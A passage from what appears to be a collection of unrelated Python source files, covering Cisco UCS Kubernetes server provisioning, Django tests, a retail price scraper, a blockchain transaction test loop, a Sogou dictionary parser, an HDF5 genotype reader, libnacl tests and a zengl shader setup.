descr="Kubernetes Boot Media")
mo_1 = CimcvmediaConfigMountEntry(parent_mo_or_dn=mo,
mapping_name=name,
device_type="cdd",
mount_protocol=scheme,
remote_ip_address=address,
image_name_variable="none",
image_file_name=filename,
image_path=path)
mo_2 = CimcvmediaConfigMountEntry(parent_mo_or_dn=mo,
mapping_name="kickstartImage",
device_type="hdd",
mount_protocol=scheme,
remote_ip_address=address,
image_name_variable="service-profile-name",
image_path=path)
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteVirtualMedia(handle):
print "Deleting Kubernetes Virtual Media Policy"
mo = handle.query_dn("org-root/mnt-cfg-policy-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createScrubPolicy(handle):
from ucsmsdk.mometa.compute.ComputeScrubPolicy import ComputeScrubPolicy
mo = ComputeScrubPolicy(flex_flash_scrub="no",
parent_mo_or_dn="org-root",
name="kube",
disk_scrub="yes",
bios_settings_scrub="no",
descr="Destroy data when SP is unassociated")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def deleteScrubPolicy(handle):
print "Deleting Kubernetes Scrub Policy"
mo = handle.query_dn("org-root/scrub-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def deleteDiskGroupConfig(handle):
print "Deleting Disk Group config"
mo = handle.query_dn("org-root/disk-group-config-Kube_Boot")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def deleteStorageProfile(handle):
print "Deleting Storage Profile"
mo = handle.query_dn("org-root/profile-kube")
try:
handle.remove_mo(mo)
handle.commit()
except AttributeError:
print "\talready deleted"
def createDiskGroupConfig(handle):
print "Adding Disk Group Config"
from ucsmsdk.mometa.lstorage.LstorageDiskGroupConfigPolicy import LstorageDiskGroupConfigPolicy
from ucsmsdk.mometa.lstorage.LstorageDiskGroupQualifier import LstorageDiskGroupQualifier
from ucsmsdk.mometa.lstorage.LstorageVirtualDriveDef import LstorageVirtualDriveDef
mo = LstorageDiskGroupConfigPolicy(parent_mo_or_dn="org-root",
policy_owner="local",
name="kube_boot",
descr="Kubernetes Boot Disk",
raid_level="mirror")
mo_1 = LstorageDiskGroupQualifier(parent_mo_or_dn=mo,
use_remaining_disks="no",
num_ded_hot_spares="unspecified",
drive_type="unspecified",
num_drives="2",
min_drive_size="unspecified",
num_glob_hot_spares="unspecified")
mo_2 = LstorageVirtualDriveDef(parent_mo_or_dn=mo, read_policy="platform-default",
drive_cache="platform-default",
strip_size="platform-default",
io_policy="platform-default",
write_cache_policy="platform-default",
access_policy="platform-default")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def createStorageProfile(handle):
from ucsmsdk.mometa.lstorage.LstorageProfile import LstorageProfile
from ucsmsdk.mometa.lstorage.LstorageDasScsiLun import LstorageDasScsiLun
mo = LstorageProfile(parent_mo_or_dn="org-root",
policy_owner="local",
name="kube",
descr="Kubernetes Storage Profile")
mo_1 = LstorageDasScsiLun(parent_mo_or_dn=mo,
local_disk_policy_name="kube_boot",
auto_deploy="auto-deploy",
expand_to_avail="yes",
lun_map_type="non-shared",
size="1",
fractional_size="0",
admin_state="online",
deferred_naming="no",
order="not-applicable",
name="KubeLUN")
handle.add_mo(mo, modify_present=True)
try:
handle.commit()
except UcsException as err:
if err.error_code == "103":
print "\talready exists"
def createKubeServers(handle, org):
createKubeBootPolicy(handle)
#createKubeLocalDiskPolicy(handle)
createDiskGroupConfig(handle)
createStorageProfile(handle)
createScrubPolicy(handle)
createKubeUUIDPools(handle)
createKubeServerPool(handle)
createKubeVirtualMedia(handle)
servers = select_kube_servers(handle)
addServersToKubePool(handle, servers)
createServiceProfileTemplate(handle)
createServers(handle, servers)
def deleteKubeServers(handle, org):
deleteServers(handle)
deleteServiceProfileTemplate(handle)
deleteKubeServerPool(handle)
deleteVirtualMedia(handle)
deleteScrubPolicy(handle)
deleteKubeBootPolicy(handle)
deleteStorageProfile(handle)
deleteDiskGroupConfig(handle)
#deleteKubeLocalDiskPolicy(handle)
deleteKubeUUIDPools(handle)
| python |
from django.test import TestCase
class geopollTest(TestCase):
"""
Tests for django-geopoll
"""
def test_geopoll(self):
pass | python |
import settings
import json
import unittest
import requests
from inventory.tests import fixture
class ApiTests(unittest.TestCase):
def setUp(self):
# Verify Server is running.
# Verify Elastic Search is running.
self.endpoint = 'http://{hostname}:{port}/v1/inventory'.format(
hostname=settings.ELASTIC_URL,
port=settings.ELASTIC_PORT)
def test_valid_request(self):
json_str = fixture('valid_request.json')
data = json.loads(json_str)
response = requests.post(self.endpoint + '/inventory', json=data)
self.assertEquals(response.status_code, 201)
if __name__ == "__main__":
unittest.main() | python |
import requests
from bs4 import BeautifulSoup
import json
from smtp import send_mail
header = {"User-agent": "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 "}
euro = 4.25
def items():
try:
with open('items.json','r') as file:
data = file.read()
global list
list = json.loads(data)
except:
print("Error when reading JSON file")
global min,min_link
def check_price(link):
# link = "www.cos2.pl/cos.html"
site_content = BeautifulSoup(requests.get(link, headers=header).content, 'html.parser')
try:
global price
site_url = link.split('/')[2]
if(site_url == 'www.x-kom.pl'):
price = int(site_content.find(attrs={'class':'u7xnnm-4 gHPNug'}).get_text().split(',')[0].replace(" ",''))
elif(site_url == 'www.komputronik.pl'):
price = site_content.find('span',attrs={'class':'price'}).find('span').get_text()
if(price == ''):
price = site_content.find('span',attrs={'class':'price'}).find('span',attrs={'ng-if':'!$ctrl.changeBaseData'}).get_text()
price = int(''.join([n for n in price if n.isdigit()]))
elif(site_url == 'www.al.to'):
name = site_content.find(attrs={'class':'sc-1x6crnh-5'}).get_text()
price = int(site_content.find(attrs={'class':'u7xnnm-4 gHPNug'}).get_text().split(',')[0].replace(" ",''))
elif(site_url == 'www.mediamarkt.pl'):
price = int(site_content.find(attrs={'itemprop':'price'}).get_text())
elif(site_url == 'www.empik.com'):
price = int(site_content.find(attrs={'class':'productPriceInfo__price ta-price withoutLpPromo'}).get_text().split(",")[0].strip())
elif(site_url == 'www.morele.net'):
try:
price = int(site_content.find('div','price-new').get_text().split(',')[0].replace(" ",''))
except:
price = site_content.find('div','price-new').get_text()
price = int(''.join([n for n in price if n.isdigit()]))
elif(site_url == 'www.euro.com.pl'):
price = site_content.find('div','price-normal selenium-price-normal').get_text()
price = int(''.join([n for n in price if n.isdigit()]))
elif(site_url == 'www.mediaexpert.pl'):
price = int(site_content.find('span','a-price_price').findNext('span','a-price_price').get_text().replace(" ",""))
elif(site_url == 'www.amazon.de'):
price = int(site_content.find('span','a-size-medium a-color-price priceBlockBuyingPriceString').get_text().split(',')[0].replace(".","")) * euro
else:
print("Site not supported: "+ site_url)
# print("{} -> {}".format(link.split('/')[2],price))
except:
print(link)
def main():
items()
# link = list["Macbook AIR"]["2019"]["Space grey"]["128"][0]
data = {}
for a in list:
for b in list[a]:
for c in list[a][b]:
for d in list[a][b][c]:
min = 10000
print("{} {} {} {}GB".format(a,b,c,d))
for e in list[a][b][c][d]:
check_price(e)
if(min>price):
min = price
min_link = e
print("{} -> {}".format(min_link.split('/')[2],min))
data["{} {} {} {}GB".format(a,b,c,d)] = [min,min_link]
comp(data)
# test_data = {"Macbook AIR 2019 Space grey 128GB": [4900, "https://www.x-kom.pl/p/506277-notebook-laptop-133-apple-macbook-air-i5-8gb-128-uhd-617-mac-os-space-grey.html"], "Macbook AIR 2019 Space grey 256GB": [5649, "https://www.x-kom.pl/p/506278-notebook-laptop-133-apple-macbook-air-i5-8gb-256-uhd-617-mac-os-space-grey.html"], "Macbook AIR 2019 Silver 128GB": [4999, "https://www.morele.net/laptop-apple-macbook-air-13-3-2019-srebrny-mvfk2ze-a-6116788/"], "Macbook AIR 2019 Silver 256GB": [5097, "https://www.mediamarkt.pl/komputery-i-tablety/laptop-apple-macbook-air-13-retina-i5-8gb-256gb-ssd-macos-srebrny-mrec2ze-a"], "Macbook PRO 2019 Space grey 128GB": [5699, "https://www.euro.com.pl/laptopy-i-netbooki/apple-laptop-mbp-tb-i5-8gb-128ssd-space-grey.bhtml"], "Macbook PRO 2019 Silver 128GB": [5649, "https://www.euro.com.pl/laptopy-i-netbooki/apple-laptop-mbp-tb-i5-8gb-128ssd-silver.bhtml"], "Macbook PRO 2017 Space grey 128GB": [4797, "https://www.mediamarkt.pl/komputery-i-tablety/laptop-apple-macbook-pro-13-3-i5-8gb-128gb-ssd-iris-plus-640-macos-srebrny-mpxr2ze-a"], "Macbook PRO 2017 Silver 128GB": [4797, "https://www.mediamarkt.pl/komputery-i-tablety/laptop-apple-macbook-pro-13-3-i5-8gb-128gb-ssd-iris-plus-640-macos-gwiezdna-szarosc-mpxq2ze-a"], "Macbook PRO 2017 Silver 256GB": [5599, "https://www.euro.com.pl/laptopy-i-netbooki/apple-macbook-pro-13-13-3-intel-core-i5-7360u-8gb-ram-256gb-dysk-os-x-sierra.bhtml"]}
# test_comp = {"Macbook AIR 2019 Space grey 128GB": [4900, "https://www.x-kom.pl/p/506277-notebook-laptop-133-apple-macbook-air-i5-8gb-128-uhd-617-mac-os-space-grey.html"],"Macbook AIR 2019 Space grey 124GB": [41230, "https://www.x-kom.pl/p/506277-notebook-laptop-133-apple-macbook-air-i5-8gb-128-uhd-617-mac-os-space-grey.html"]}
def comp(data):
with open('prices.json','r') as file:
json_data = json.loads(file.read())
lower = False
higher = False
body = {}
for item in json_data:
if(data[item][0] < json_data[item][0]):
body[item] = [json_data[item][0],data[item][0],data[item][1]]
lower = True
elif(data[item][0] > json_data[item][0]):
body[item] = [data[item][0],json_data[item][0],data[item][1]]
higher = True
if(lower):
print("Lower price")
with open('prices.json','w') as file:
json.dump(data,file, indent=4, sort_keys=True)
send_mail(body)
print("Update completed")
elif(higher):
print("Higher price")
with open('prices.json','w') as file:
json.dump(data,file, indent=4, sort_keys=True)
else:
print("No changes")
if __name__ == '__main__':
main()
| python |
import subprocess
import time
from timeit import default_timer as timer
start = timer()
commands_node1 = '''
export NODE_ID=3001
'''
addresses = [
'13XfCX8bLpdu8YgnXPD4BDeBC5RyvqBfPh',
'14L3zLQWPiXM6hZXdfmgjET8crM52VJpXX',
'1C4tyo8poeG1uFioZjtgnLZKotEUZFJyVh',
'18Nt9jiYVjm2TxCTHNSeYquriaauh5wfux',
'16uqNuajndwknbHSQw1cfTvSgsXxa5Vxi8',
'1AqNL5SPcuWqUT1SjTEQ3WGDLfy47HK74c',
'17aju9bJh3G7xC9PAkQ1j5czizA31rN77S',
'1Ci67qmp8KerJA3zZhsDC7AcXz8RCZwbt',
'1MzLjrr737WtVpubSGxN6CUECBD2vnQqef',
'165KxLW2bFms5wtKs2sNQXfD8TLQrehGCT',
'14RJHhG374XyuTLfZ48qRxUdxRLWj3BcA7',
'13L7UYXjUCGUUKF5o4oExDFQnV6p3AkDoB',
]
send_repeat = ["./blockchain_ureca send -from ",
" -amount 1 -to "]
def copy_db():
commands = "export NODE_ID=3002\n"
if i % 100 == 0 and i > 0:
print("i: ", i)
commands += "cp blockchain_3000.db blockchain_3002.db" + '\n'
process_node = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
process_node.communicate(commands.encode('utf-8'))
for t in range(10000):
print("t: ", t)
for i in range(10):
commands_node1 = "export NODE_ID=3002\n"
if i % 100 == 0 and i > 0:
print("i: ", i)
commands_node1 += send_repeat[0] + addresses[i] + send_repeat[1] + addresses[10] + '\n'
process_node1 = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = process_node1.communicate(commands_node1.encode('utf-8'))
time.sleep(1)
# Make sure the new txs has been put into database
time.sleep(1)
copy_db()
time.sleep(0.5)
# commands_node1 += "./blockchain_ureca startnode -port 9090\n"
# print(commands_node1)
process_node1 = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = process_node1.communicate(commands_node1.encode('utf-8'))
# print(out)
end = timer()
print(end-start)
| python |
from rest_framework import serializers
from can_server.models import DbcFile, CanSettings
class DbcFileSerializer(serializers.ModelSerializer):
class Meta:
model = DbcFile
fields = ('FileName', 'FileData')
class CanSettingsSerializer(serializers.ModelSerializer):
class Meta:
model = CanSettings
fields = ('bustype', 'channel', 'bitrate')
| python |
from django.core import mail
from django.test import override_settings, TestCase
from django.urls import reverse
from opentech.apply.utils.testing.tests import BaseViewTestCase
from .factories import OAuthUserFactory, StaffFactory, UserFactory
@override_settings(ROOT_URLCONF='opentech.apply.urls')
class BaseTestProfielView(TestCase):
@classmethod
def setUpTestData(cls):
cls.url = reverse('users:account')
class TestProfileView(BaseTestProfielView):
def setUp(self):
self.user = UserFactory()
self.client.force_login(self.user)
def test_cant_acces_if_not_logged_in(self):
self.client.logout()
response = self.client.get(self.url, follow=True)
# Initial redirect will be via to https through a 301
self.assertRedirects(response, reverse('users_public:login') + '?next=' + self.url, status_code=301)
def test_includes_change_password(self):
response = self.client.get(self.url, follow=True)
self.assertContains(response, reverse('users:password_change'))
def test_doesnt_includes_change_password_for_oauth(self):
self.client.force_login(OAuthUserFactory())
response = self.client.get(self.url, follow=True)
self.assertNotContains(response, reverse('users:password_change'))
def test_cant_set_slack_name(self):
response = self.client.get(self.url, follow=True)
self.assertNotContains(response, 'Slack name')
class TestStaffProfileView(BaseTestProfielView):
def setUp(self):
self.staff = StaffFactory()
self.client.force_login(self.staff)
def test_can_set_slack_name(self):
response = self.client.get(self.url, follow=True)
self.assertContains(response, 'Slack name')
class TestPasswordReset(BaseViewTestCase):
user_factory = UserFactory
url_name = 'users:{}'
base_view_name = 'password_reset'
def test_recieves_email(self):
response = self.post_page(None, data={'email': self.user.email})
self.assertRedirects(response, self.url(None, view_name='password_reset_done'))
self.assertEqual(len(mail.outbox), 1)
self.assertIn('https://testserver/account/password/reset/confirm', mail.outbox[0].body)
| python |
import xlrd
class ReadExcel:
def readexcel(self, url):
data = xlrd.open_workbook(url) # 打开xls文件
table = data.sheets()[0] # 打开第一张表
nrows = table.nrows # 获取表的行数
htmlhead = '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>'''
htmltable = '<table border="1">'
htmltable += '<tr>'
for row in range(nrows):
htmltable += '<tr>'
for e in table.row_values(row):
htmltable += '<td>' + str(e) + '</td>'
htmltable += '</tr>'
htmltable += '</table>'
htmltail = '</body></html>'
html = htmlhead + htmltable + htmltail
print(html)
return html
| python |
from __future__ import absolute_import
from six.moves import range
try:
import h5py
except:
pass
import logging
import scipy as sp
from fastlmm.pyplink.snpset import *
from fastlmm.pyplink.altset_list import *
#!!document the format
class Hdf5(object):
def __init__(self,filename, order = 'F',blocksize=5000):
self._ran_once = False
self.h5 = None
##!! copy relevent comments from Bed reader
self.filename=filename
self.order = order
self.blocksize = blocksize
def copyinputs(self, copier):
copier.input(self.filename)
@property
def snp_to_index(self):
self.run_once()
return self._snp_to_index
def run_once(self):
if (self._ran_once):
return
self._ran_once = True
try:
self.h5 = h5py.File(self.filename, "r")
except IOError as e:
raise IOError("Missing or unopenable file '{0}' -- Native error message: {1}".format(self.filename,e))
self._original_iids = sp.array(sp.array(self.h5['iid']),dtype=str)
self.rs = sp.array(sp.array(self.h5['rs']),dtype='str')
self.pos = sp.array(self.h5['pos'])
## similar code in bed
self._snp_to_index = {}
logging.info("indexing snps");
for i,snp in enumerate(self.rs):
if snp in self._snp_to_index : raise Exception("Expect snp to appear in bim file only once. ({0})".format(snp))
self._snp_to_index[snp]=i
self.snpsInFile = self.h5['snps']
if "SNP-major" not in self.snpsInFile.attrs: raise Exception("In Hdf5 the 'snps' matrix must have a Boolean 'SNP-major' attribute")
self.is_snp_major = self.snpsInFile.attrs["SNP-major"]
S_original = len(self.rs)
N_original = len(self.original_iids)
if self.is_snp_major:
if not self.snpsInFile.shape == (S_original, N_original) : raise Exception("In Hdf5, snps matrix dimensions don't match those of 'rs' and 'iid'")
else:
if not self.snpsInFile.shape == (N_original, S_original) : raise Exception("In Hdf5, snps matrix dimensions don't match those of 'rs' and 'iid'")
@property
def snp_count(self):
self.run_once()
return len(self.rs);
@property
def original_iids(self):
self.run_once()
return self._original_iids
#same code is in Bed. Could this be moved to an abstract class?
def read(self,snp_set = AllSnps(), order="F", dtype=SP.float64, force_python_only=False):
self.run_once()
snpset_withbed = snp_set.addbed(self)
return self.read_with_specification(snpset_withbed, order=order, dtype=dtype, force_python_only=force_python_only)
@staticmethod
#should move into utils
def is_sorted_without_repeats(list):
if len(list) < 2:
return True
for i in range(1,len(list)):
if not list[i-1] < list[i]:
return False
return True
def __del__(self):
if self.h5 != None: # we need to test this because Python doesn't guarantee that __init__ was fully run
self.h5.close()
def read_direct(self, snps, selection=sp.s_[:,:]):
if self.is_snp_major:
selection = tuple(reversed(selection))
if snps.flags["F_CONTIGUOUS"]:
self.snpsInFile.read_direct(snps.T,selection)
else:
self.snpsInFile.read_direct(snps,selection)
#!! much code the same as for Bed
def create_block(self, blocksize, dtype, order):
N_original = len(self.original_iids) #similar code else where -- make a method
matches_order = self.is_snp_major == (order =="F") #similar code else where -- make a method
opposite_order = "C" if order == "F" else "F"#similar code else where -- make a method
if matches_order:
return sp.empty([N_original,blocksize], dtype=dtype, order=order)
else:
return sp.empty([N_original,blocksize], dtype=dtype, order=opposite_order)
def read_with_specification(self, snpset_with_snpreader, order="F", dtype=SP.float64, force_python_only=False):
self.run_once()
order = order.upper()
opposite_order = "C" if order == "F" else "F"
snp_index_list = sp.array(list(snpset_with_snpreader)) # Is there a way to create an array from an iterator without putting it through a list first?
S = len(snp_index_list)
S_original = self.snp_count
N_original = len(self.original_iids)
# Check if snps and iids indexes are in order and in range
snps_are_sorted = Hdf5.is_sorted_without_repeats(snp_index_list)
if hasattr(self,'_ind_used'):
iid_index_list = self._ind_used
iid_is_sorted = Hdf5.is_sorted_without_repeats(iid_index_list)
else:
iid_index_list = sp.arange(N_original)
iid_is_sorted = True
N = len(iid_index_list)
SNPs = sp.empty([N, S], dtype=dtype, order=order)
matches_order = self.is_snp_major == (order =="F")
is_simple = not force_python_only and iid_is_sorted and snps_are_sorted and matches_order #If 'is_simple' may be able to use a faster reader
# case 1 - all snps & all ids requested
if is_simple and S == S_original and N == N_original:
self.read_direct(SNPs)
# case 2 - some snps and all ids
elif is_simple and N == N_original:
self.read_direct(SNPs, sp.s_[:,snp_index_list])
# case 3 all snps and some ids
elif is_simple and S == S_original:
self.read_direct(SNPs, sp.s_[iid_index_list,:])
# case 4 some snps and some ids -- use blocks
else:
blocksize = min(self.blocksize, S)
block = self.create_block(blocksize, dtype, order)
if not snps_are_sorted:
snp_index_index_list = sp.argsort(snp_index_list)
snp_index_list_sorted = snp_index_list[snp_index_index_list]
else:
snp_index_index_list = sp.arange(S)
snp_index_list_sorted = snp_index_list
for start in range(0, S, blocksize):
#print start
end = min(start+blocksize,S)
if end-start < blocksize: #On the last loop, the buffer might be too big, so make it smaller
block = self.create_block(end-start, dtype, order)
snp_index_list_forblock = snp_index_list_sorted[start:end]
snp_index_index_list_forblock = snp_index_index_list[start:end]
self.read_direct(block, sp.s_[:,snp_index_list_forblock])
SNPs[:,snp_index_index_list_forblock] = block[iid_index_list,:]
rs = self.rs[snp_index_list]
pos = self.pos[snp_index_list,:]
iids = sp.array(self.original_iids[iid_index_list],dtype="str") #Need to make another copy of to stop it from being converted to a list of 1-d string arrays
has_right_order = (order=="C" and SNPs.flags["C_CONTIGUOUS"]) or (order=="F" and SNPs.flags["F_CONTIGUOUS"])
#if SNPs.shape == (1, 1):
assert(SNPs.shape == (N, S) and SNPs.dtype == dtype and has_right_order)
ret = {
'rs' :rs,
'pos' :pos,
'snps' :SNPs,
'iid' :iids
}
return ret
@property
def ind_used(self):
# doesn't need to self.run_once() because only uses original inputs
return self._ind_used
@ind_used.setter
def ind_used(self, value):
'''
Tell the Bed reader to return data for only a subset (perhaps proper) of the individuals in a particular order
e.g. 2,10,0 says to return data for three users: the user at index position 2, the user at index position 10, and the user at index position 0.
'''
# doesn't need to self.run_once() because only uses original inputs
self._ind_used = value
@staticmethod
def write(snpMatrix, hdf5file, dtype='f8',snp_major=True,compression=None):
if not isinstance(dtype, str) or len(dtype) != 2 or dtype[0] != 'f' : raise Exception("Expect dtype to start with 'f', e.g. 'f4' for single, 'f8' for double")
data = (snpMatrix['snps'].T) if snp_major else snpMatrix['snps']
with h5py.File(hdf5file, "w") as h5:
h5.create_dataset('snps', data=data,dtype=dtype,compression=compression,shuffle=True)
h5['snps'].attrs["SNP-major"] = snp_major
h5.create_dataset('iid', data=snpMatrix['iid'])
h5.create_dataset('pos', data=snpMatrix['pos'])
h5.create_dataset('rs', data=snpMatrix['rs'])
| python |
__author__ = 'lionel'
#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
import sys
# 搜狗的scel词库就是保存的文本的unicode编码,每两个字节一个字符(中文汉字或者英文字母)
# 找出其每部分的偏移位置即可
# 主要两部分
# 1.全局拼音表,貌似是所有的拼音组合,字典序
# 格式为(index,len,pinyin)的列表
# index: 两个字节的整数 代表这个拼音的索引
# len: 两个字节的整数 拼音的字节长度
# pinyin: 当前的拼音,每个字符两个字节,总长len
#
# 2.汉语词组表
# 格式为(same,py_table_len,py_table,{word_len,word,ext_len,ext})的一个列表
# same: 两个字节 整数 同音词数量
# py_table_len: 两个字节 整数
# py_table: 整数列表,每个整数两个字节,每个整数代表一个拼音的索引
#
# word_len:两个字节 整数 代表中文词组字节数长度
# word: 中文词组,每个中文汉字两个字节,总长度word_len
# ext_len: 两个字节 整数 代表扩展信息的长度,好像都是10
# ext: 扩展信息 前两个字节是一个整数(不知道是不是词频) 后八个字节全是0
#
# {word_len,word,ext_len,ext} 一共重复same次 同音词 相同拼音表
# 拼音表偏移,
startPy = 0x1540
# 汉语词组表偏移
startChinese = 0x2628
# 全局拼音表
GPy_Table = {}
# 解析结果
# 元组(词频,拼音,中文词组)的列表
GTable = []
def byte2str(data):
# 将原始字节码转为字符串
i = 0
length = len(data)
ret = u''
while i < length:
x = data[i] + data[i + 1]
t = unichr(struct.unpack('H', x)[0])
if t == u'\r':
ret += u'\n'
elif t != u' ':
ret += t
i += 2
return ret
# 获取拼音表
def getPyTable(data):
if data[0:4] != "\x9D\x01\x00\x00":
return None
data = data[4:]
pos = 0
length = len(data)
while pos < length:
index = struct.unpack('H', data[pos] + data[pos + 1])[0]
# print index,
pos += 2
l = struct.unpack('H', data[pos] + data[pos + 1])[0]
# print l,
pos += 2
py = byte2str(data[pos:pos + l])
# print py
GPy_Table[index] = py
pos += l
# 获取一个词组的拼音
def getWordPy(data):
pos = 0
length = len(data)
ret = u''
while pos < length:
index = struct.unpack('H', data[pos] + data[pos + 1])[0]
ret += GPy_Table[index]
pos += 2
return ret
# 获取一个词组
def getWord(data):
pos = 0
length = len(data)
ret = u''
while pos < length:
index = struct.unpack('H', data[pos] + data[pos + 1])[0]
ret += GPy_Table[index]
pos += 2
return ret
# 读取中文表
def getChinese(data):
# import pdb
# pdb.set_trace()
pos = 0
length = len(data)
while pos < length:
# 同音词数量
same = struct.unpack('H', data[pos] + data[pos + 1])[0]
# print '[same]:', same,
# 拼音索引表长度
pos += 2
py_table_len = struct.unpack('H', data[pos] + data[pos + 1])[0]
# 拼音索引表
pos += 2
py = getWordPy(data[pos: pos + py_table_len])
# 中文词组
pos += py_table_len
for i in xrange(same):
# 中文词组长度
c_len = struct.unpack('H', data[pos] + data[pos + 1])[0]
# 中文词组
pos += 2
word = byte2str(data[pos: pos + c_len])
# 扩展数据长度
pos += c_len
ext_len = struct.unpack('H', data[pos] + data[pos + 1])[0]
# 词频
pos += 2
count = struct.unpack('H', data[pos] + data[pos + 1])[0]
# 保存
GTable.append((count, py, word))
# 到下个词的偏移位置
pos += ext_len
def deal(file_name):
print('-' * 60)
f = open(file_name, 'rb')
data = f.read()
f.close()
if data[0:12] != "\x40\x15\x00\x00\x44\x43\x53\x01\x01\x00\x00\x00":
print("确认你选择的是搜狗(.scel)词库?")
sys.exit(0)
# pdb.set_trace()
print("词库名:", byte2str(data[0x130:0x338])) # .encode('GB18030')
print("词库类型:", byte2str(data[0x338:0x540])) # .encode('GB18030')
print("描述信息:", byte2str(data[0x540:0xd40])) # .encode('GB18030')
print("词库示例:", byte2str(data[0xd40:startPy])) # .encode('GB18030')
getPyTable(data[startPy:startChinese])
getChinese(data[startChinese:])
if __name__ == '__main__':
# 将要转换的词库添加在这里就可以了
o = ['明星【官方推荐】.scel']
# o = ['全国大酒店名录.scel', '全国宾馆名录.scel', '全国旅行社名录.scel']
# o = ['饮食大全【官方推荐】.scel']
# o = ['最详细的全国地名大全.scel']
for f in o:
deal(f)
# 保存结果到sougou.txt
f = open('sougou.txt', 'w')
for count, py, word in GTable:
# GTable保存着结果,是一个列表,每个元素是一个元组(词频,拼音,中文词组),有需要的话可以保存成自己需要个格式
# 我没排序,所以结果是按照上面输入文件的顺序
f.write(unicode('%(count)s' % {'count': count} + ' ' + word).encode('utf-8')) # 最终保存文件的编码,可以自给改
f.write('\n')
f.close()
| python |
from . import upgrade_0_to_1
from . import upgrade_2_to_3
from . import upgrade_7_to_8
from . import upgrade_8_to_9
def init_new_testsuite(engine, session, name):
"""When all the metadata fields are setup for a suite, call this
to provision the tables."""
# We only need to do the test-suite agnostic upgrades,
# most of the upgrades target nts or compile only.
upgrade_0_to_1.initialize_testsuite(engine, session, name)
session.commit()
upgrade_2_to_3.upgrade_testsuite(engine, session, name)
session.commit()
upgrade_7_to_8.upgrade_testsuite(engine, session, name)
session.commit()
upgrade_8_to_9.upgrade_testsuite(engine, session, name)
session.commit()
| python |
class Field:
def __init__(self, left_lb, sv, e, right_lb):
self._parameter = None
self._left_lb = left_lb
self._sv = sv
self._e = e
self._right_lb = right_lb
def set_parameter(self, parameter):
self._parameter = parameter
def get_parameter(self):
return self._parameter
def set_left_lb_text(self, text):
self._left_lb.config(text=f"{text} :")
def set_right_lb_text(self, text):
self._right_lb.config(text=text)
def set_text(self, text):
self.clear_text()
self._e.insert(0, text)
def get_text(self):
return self._e.get()
def clear_text(self):
self._e.delete(0, "end")
def set_callback_on_text_change(self, callback):
self._sv.trace("w", lambda name, index, mode, sv=self._sv: callback(sv))
def activate(self):
self._e["state"] = "normal"
def disable(self):
self._e["state"] = "disable"
def readonly(self):
self._e["state"] = "readonly"
| python |
from django.core.validators import RegexValidator
from django.utils.translation import gettext_lazy as _
class BusinessIDValidator(RegexValidator):
regex = r"^[0-9]{7}\-[0-9]{1}\Z"
message = _("Enter a valid business ID.")
| python |
# Import libnacl libs
import libnacl.public
import libnacl.dual
# Import python libs
import unittest
class TestDual(unittest.TestCase):
'''
'''
def test_secretkey(self):
'''
'''
msg = b'You\'ve got two empty halves of coconut and you\'re bangin\' \'em together.'
bob = libnacl.dual.DualSecret()
alice = libnacl.dual.DualSecret()
bob_box = libnacl.public.Box(bob.sk, alice.pk)
alice_box = libnacl.public.Box(alice.sk, bob.pk)
bob_ctxt = bob_box.encrypt(msg)
self.assertNotEqual(msg, bob_ctxt)
bclear = alice_box.decrypt(bob_ctxt)
self.assertEqual(msg, bclear)
alice_ctxt = alice_box.encrypt(msg)
self.assertNotEqual(msg, alice_ctxt)
aclear = alice_box.decrypt(alice_ctxt)
self.assertEqual(msg, aclear)
self.assertNotEqual(bob_ctxt, alice_ctxt)
def test_publickey(self):
'''
'''
msg = b'You\'ve got two empty halves of coconut and you\'re bangin\' \'em together.'
bob = libnacl.dual.DualSecret()
alice = libnacl.dual.DualSecret()
alice_pk = libnacl.public.PublicKey(alice.pk)
bob_box = libnacl.public.Box(bob.sk, alice_pk)
alice_box = libnacl.public.Box(alice.sk, bob.pk)
bob_ctxt = bob_box.encrypt(msg)
self.assertNotEqual(msg, bob_ctxt)
bclear = alice_box.decrypt(bob_ctxt)
self.assertEqual(msg, bclear)
def test_sign(self):
msg = (b'Well, that\'s no ordinary rabbit. That\'s the most foul, '
b'cruel, and bad-tempered rodent you ever set eyes on.')
signer = libnacl.dual.DualSecret()
signed = signer.sign(msg)
signature = signer.signature(msg)
self.assertNotEqual(msg, signed)
veri = libnacl.sign.Verifier(signer.hex_vk())
verified = veri.verify(signed)
verified2 = veri.verify(signature + msg)
self.assertEqual(verified, msg)
self.assertEqual(verified2, msg)
| python |
import numpy as np
import zengl
from objloader import Obj
from PIL import Image
from progress.bar import Bar
from skimage.filters import gaussian
import assets
from window import Window
window = Window(720, 720)
ctx = zengl.context()
image = ctx.image(window.size, 'rgba8unorm', samples=4)
depth = ctx.image(window.size, 'depth24plus', samples=4)
image.clear_value = (0.2, 0.2, 0.2, 1.0)
size = 1024
samples = 512
temp_color = ctx.image((size, size), 'r32sint')
temp_depth = ctx.image((size, size), 'depth24plus')
temp_color.clear_value = -1
model = Obj.open(assets.get('ao-map-target.obj')).pack('vx vy vz nx ny nz tx ty')
vertex_buffer = ctx.buffer(model)
uniform_buffer = ctx.buffer(size=64)
ctx.includes['size'] = f'const int size = {size};'
texcoord_pipeline = ctx.pipeline(
vertex_shader='''
#version 330
layout (std140) uniform Common {
mat4 mvp;
};
layout (location = 0) in vec3 in_vertex;
layout (location = 1) in vec3 in_normal;
layout (location = 2) in vec2 in_texcoord;
out vec2 v_texcoord;
void main() {
gl_Position = mvp * vec4(in_vertex, 1.0);
v_texcoord = in_texcoord;
}
''',
fragment_shader='''
#version 330
#include "size"
in vec2 v_texcoord;
layout (location = 0) out int out_address;
void main() {
